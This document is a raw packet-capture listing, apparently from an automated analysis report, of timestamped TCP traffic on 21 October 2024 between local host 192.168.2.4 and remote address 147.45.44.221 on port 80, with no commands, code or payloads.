                                                                                                                                                    Oct 21, 2024 08:47:27.952270985 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.952271938 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.952302933 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.952320099 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.952334881 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.952346087 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.952368021 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.952378035 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.952409983 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.952416897 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.952450037 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.952465057 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.952498913 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.952500105 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.952545881 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.952548981 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.952579975 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.952600956 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.952613115 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.952629089 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.952644110 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.952655077 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.952677965 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.952691078 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.952706099 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.952719927 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.952739000 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.952752113 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.952779055 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.990367889 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.990432024 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.990447998 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.990469933 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.990474939 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.990514994 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.064533949 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.064565897 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.064604044 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.064626932 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.064641953 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.064659119 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.064673901 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.064704895 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.064734936 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.064759016 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.064785004 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.064799070 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.064812899 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.064826965 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.064846039 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.064863920 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.064882040 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.064889908 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.064913034 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.064923048 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.064945936 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.064954042 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.064989090 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.064995050 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.065026999 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.065037966 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.065120935 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.065129042 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.065160990 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.065172911 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.065191984 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.065196037 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.065224886 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.065233946 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.065267086 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.065268993 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.065299034 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.065306902 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.065376043 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.065407991 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.065417051 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.065440893 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.065450907 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.065473080 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.065484047 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.065505028 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.065515995 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.065536022 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.065548897 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.065567017 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.065576077 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.065599918 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.065608978 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.065630913 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.065638065 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.065664053 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.065673113 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.065696955 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.065706015 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.065727949 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.065738916 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.065762043 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.065773010 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.065794945 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.065809965 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.065840960 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.071408033 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.071868896 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.071938992 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.071947098 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.071974993 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.071993113 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.072010994 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.072021961 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.072046041 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.072056055 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.072078943 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.072088957 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.072120905 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.072124004 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.072153091 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.072171926 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.072186947 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.072204113 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.072221994 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.072228909 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.072257996 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.072279930 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.072292089 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.072303057 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.072325945 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.072335958 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.072360039 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.072371960 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.072396994 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.072412968 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.072431087 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.072463989 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.072474003 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.072494984 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.072501898 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.072535992 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.072547913 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.072583914 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.072590113 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.072624922 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.072637081 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.072662115 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.072670937 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.072695971 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.072702885 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.072737932 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.087266922 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.087321997 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.087399006 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.109770060 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.109826088 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.109850883 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.109862089 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.109908104 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.109946012 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.183039904 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.183294058 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.183329105 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.183331966 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.183374882 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.183399916 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.183440924 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.183449030 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.183451891 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.183491945 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.183502913 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.183543921 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.183548927 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.183603048 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.183608055 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.183648109 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.183655977 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.183705091 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.183708906 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.183742046 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.183758020 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.183775902 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.183788061 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.183805943 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.183825016 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.183852911 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.183861017 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.183912039 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.183924913 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.183957100 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.183964014 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.183995962 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.184010029 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.184032917 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.184041977 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.184068918 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.184077024 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.184102058 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.184117079 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.184135914 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.184144020 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.184169054 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.184181929 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.184214115 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.184220076 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.184248924 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.184263945 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.184282064 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.184288979 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.184314966 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.184329987 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.184346914 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.184359074 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.184380054 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.184391975 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.184410095 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.184428930 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.184442997 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.184465885 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.184475899 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.184490919 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.184509039 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.184516907 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.184545040 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.184556961 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.184578896 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.184592009 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.184612036 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.184626102 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.184640884 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.184659958 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.184675932 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.184683084 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.184712887 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.184729099 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.184746027 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.184760094 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.184779882 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.184791088 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.184813023 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.184827089 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.184847116 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.184859991 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.184881926 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.184895039 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.184926033 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.190635920 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.190686941 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.190691948 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.190741062 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.190742016 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.190774918 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.190793991 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.190814018 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.190824032 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.190864086 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.190871000 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.190913916 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.190917015 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.190964937 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.190968990 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.191004038 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.191016912 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.191032887 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.191051006 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.191077948 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.191082954 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.191119909 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.191145897 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.191152096 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.191164017 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.191193104 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.191203117 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.191235065 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.191252947 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.191281080 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.191286087 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.191315889 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.191332102 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.191349030 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.191365957 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.191382885 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.191411972 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.191443920 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.191451073 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.191484928 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.191498041 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.191518068 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.191529989 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.191551924 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.191571951 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.191580057 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.191591024 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.191613913 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.191623926 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.191651106 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.191660881 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.191683054 CEST8049732147.45.44.221192.168.2.4
